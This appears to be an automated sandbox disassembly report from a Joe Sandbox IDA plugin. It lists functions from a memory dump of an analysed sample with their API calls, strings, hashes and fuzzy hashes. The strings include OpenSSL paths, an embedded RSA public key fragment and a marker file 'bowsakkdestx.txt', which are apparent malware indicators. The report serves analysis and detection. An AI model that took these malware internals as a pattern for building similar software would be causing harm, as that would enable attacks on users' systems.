Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9

Function 004416EB Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 00441726
__invoke_watson.LIBCMT ref: 00441780
_strlen.LIBCMT ref: 00441734

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

_strnlen.LIBCMT ref: 004417BF
__lock.LIBCMT ref: 004417D0
__getenv_helper_nolock.LIBCMT ref: 004417DB

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: b31f97ea329719022fda34d1be00e9f165c1a047629ea24459edfa5c04f004d4
Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
Opcode Fuzzy Hash: b31f97ea329719022fda34d1be00e9f165c1a047629ea24459edfa5c04f004d4
Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD

Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 004507C3

Strings

lib(%lu), xrefs: 0045071C
error:%08lX:%s:%s:%s, xrefs: 00450792
func(%lu), xrefs: 00450734
reason(%lu), xrefs: 00450758

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ___from_strstr_to_strchr
String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
API String ID: 601868998-2416195885
Opcode ID: 93747ef9676871f384b6e598e8205c6ebfa69a96be3ff907559ef05580cb13b5
Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
Opcode Fuzzy Hash: 93747ef9676871f384b6e598e8205c6ebfa69a96be3ff907559ef05580cb13b5
Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96

Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045AE4B
_memset.LIBCMT ref: 0045AE6C

Strings

.\crypto\buffer\buffer.c, xrefs: 0045AE88, 0045AEBE, 0045AED3, 0045AEF0
g9F, xrefs: 0045AE31, 0045AE36, 0045AE63, 0045AF14, 0045AF1D

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$g9F
API String ID: 2102423945-3653307630
Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9

Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

_fprintf.LIBCMT ref: 0046307E
_memset.LIBCMT ref: 004630AB

Strings

.\crypto\pem\pem_lib.c, xrefs: 00463097
phrase is too short, needs to be at least %d chars, xrefs: 00463070
Enter PEM pass phrase:, xrefs: 00463036, 00463043, 00463084

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _fprintf_memset
String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
API String ID: 3021507156-3399676524
Opcode ID: 37c0a0619d1de68f8926526a4348b91c256fa9f986865ef3ae2ab210aec5a9ed
Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
Opcode Fuzzy Hash: 37c0a0619d1de68f8926526a4348b91c256fa9f986865ef3ae2ab210aec5a9ed
Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA

Function 00419E70 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00419EB8
_memset.LIBCMT ref: 00419EC9
_memset.LIBCMT ref: 00419EDA

Strings

-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24, xrefs: 00419EC4
p2Q, xrefs: 00419EE2

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memset
String ID: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24$p2Q
API String ID: 2102423945-1170899715
Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD

Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0043B70B

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(007F0000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5

_free.LIBCMT ref: 0043B71E

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: ac30be484878ed1c1fbcd2781803b0d6d497061a6a5de6108b0294a208768cdb
Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
Opcode Fuzzy Hash: ac30be484878ed1c1fbcd2781803b0d6d497061a6a5de6108b0294a208768cdb
Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC

Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
DispatchMessageW.USER32(?), ref: 0041F0B6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98

Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
DispatchMessageW.USER32(?), ref: 0041E546
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98

Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
DispatchMessageW.USER32(?), ref: 0041FA7B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4

Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
DispatchMessageW.USER32(?), ref: 0041FE2B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4

Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00417C6A
_memmove.LIBCMT ref: 00417CD4

Strings

string too long, xrefs: 00417D36
invalid string position, xrefs: 00417D2C

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 3e8e620cdafad959620aa8092266a2dd437b35ec9cc4a24f81571b5e96538b17
Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
Opcode Fuzzy Hash: 3e8e620cdafad959620aa8092266a2dd437b35ec9cc4a24f81571b5e96538b17
Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9

Function 004229A9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00422A5F
__write.LIBCMT ref: 00422A92
__flsbuf.LIBCMT ref: 00422AC0

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Strings

A, xrefs: 00422A9F, 00422A3A, 00422A87, 00422AB8, 00422A44

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write
String ID: A
API String ID: 3115901604-2078354741
Opcode ID: d1228be24c2bcabe2754a9de32c20230a63627f67e8be6dccc8404be8c77e6ea
Instruction ID: 74c924880168de559db59c14e1a2c39f6381d3f38157317aef41ba5f0430eaff
Opcode Fuzzy Hash: d1228be24c2bcabe2754a9de32c20230a63627f67e8be6dccc8404be8c77e6ea
Instruction Fuzzy Hash: F041F870700626BFDB289F69EA8056F77A5BF44360B94813FE805C7740D6F8DD818B58

Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004141E4
_memmove.LIBCMT ref: 00414215

Strings

string too long, xrefs: 00414256
invalid string position, xrefs: 00414260

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 749c0c363911c6b197ced0573a154d5961979834c741efb9d592a9087351605d
Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
Opcode Fuzzy Hash: 749c0c363911c6b197ced0573a154d5961979834c741efb9d592a9087351605d
Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD

Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045AD72
_memset.LIBCMT ref: 0045AE15

Strings

.\crypto\buffer\buffer.c, xrefs: 0045AD8B, 0045ADBE, 0045ADD0, 0045ADE7
C7F, xrefs: 0045AD51, 0045AD56, 0045AD69, 0045AE0B, 0045AE14

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$C7F
API String ID: 2102423945-2013712220
Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9

Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 0040C5DA
UuidToStringA.RPCRT4(?,00000000), ref: 0040C5F6
RpcStringFreeA.RPCRT4(00000000), ref: 0040C640

Strings

8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: StringUuid$CreateFree
String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
API String ID: 3044360575-2335240114
Opcode ID: f368a6ffb16046697342e4746a0b21291bac470e9a8aaf6bc929c7402f94eed5
Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
Opcode Fuzzy Hash: f368a6ffb16046697342e4746a0b21291bac470e9a8aaf6bc929c7402f94eed5
Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A

Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9

Strings

bowsakkdestx.txt, xrefs: 0040C49D

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: 23fc771ccd0fb84302ef14e270554964de1445af84905d4ed2fddc0fcc519b49
Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
Opcode Fuzzy Hash: 23fc771ccd0fb84302ef14e270554964de1445af84905d4ed2fddc0fcc519b49
Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5

Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
RegisterClassExW.USER32(00000030), ref: 0041BA73

Strings

0, xrefs: 0041BA1D
LPCWSTRszWindowClass, xrefs: 0041BA65

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ClassCursorLoadRegister
String ID: 0$LPCWSTRszWindowClass
API String ID: 1693014935-1496217519
Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9

Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
DeleteFileA.KERNEL32(?), ref: 0040C45B

Strings

bowsakkdestx.txt, xrefs: 0040C442

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Path$AppendDeleteFileFolder
String ID: bowsakkdestx.txt
API String ID: 610490371-2616962270
Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55

Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 0040ED66
_memmove.LIBCMT ref: 0040EE25

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memmove_strtok
String ID:
API String ID: 3446180046-0
Opcode ID: f45f107c7619ba89dcc337b3fde2fe8cba8a3772eceece06fe5d0b8309d58b40
Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
Opcode Fuzzy Hash: f45f107c7619ba89dcc337b3fde2fe8cba8a3772eceece06fe5d0b8309d58b40
Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96

Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042218E
__read_nolock.LIBCMT ref: 0042225E
__filbuf.LIBCMT ref: 00422281
_memset.LIBCMT ref: 004222C5

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
